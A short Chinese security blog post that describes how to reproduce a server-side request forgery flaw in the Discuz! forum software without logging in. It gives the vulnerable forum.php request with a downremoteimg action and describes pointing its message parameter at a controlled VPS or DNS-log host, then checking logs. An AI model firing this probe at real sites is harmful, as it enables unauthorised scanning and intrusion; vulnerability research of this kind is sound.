Web漏洞之 Discuz! SSRF(无须登陆无须条件)

  • A+
所属分类:网络安全
Web漏洞之 Discuz! SSRF(无须登陆无须条件)

0x01 前言

这个Discuz 的SSRF也是之前实战挖掘过程中经常遇到的一个洞,在这里分享给大家,以后遇到也可以测试一波。

0x02漏洞复现

http://xxxx/forum.php?mod=ajax&action=downremoteimg&message=
	
&formhash=09cec465

这里我们准备一个远程的vps并开启web服务,也可以使用dnslog工具。

Web漏洞之 Discuz! SSRF(无须登陆无须条件)

将message参数中的链接替换为vps的地址,然后发送请求。

Web漏洞之 Discuz! SSRF(无须登陆无须条件)

通过判断web访问日志查看这个IP来判断目标是否存在SSRF漏洞。

3.x 版本如果请求提示xss拦截要带上 formhash 加cookie,之前版本好像不用。

有关SSRF更加详细的原理及说明,可以参考:https://blog.csdn.net/u010726042/article/details/77806775

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: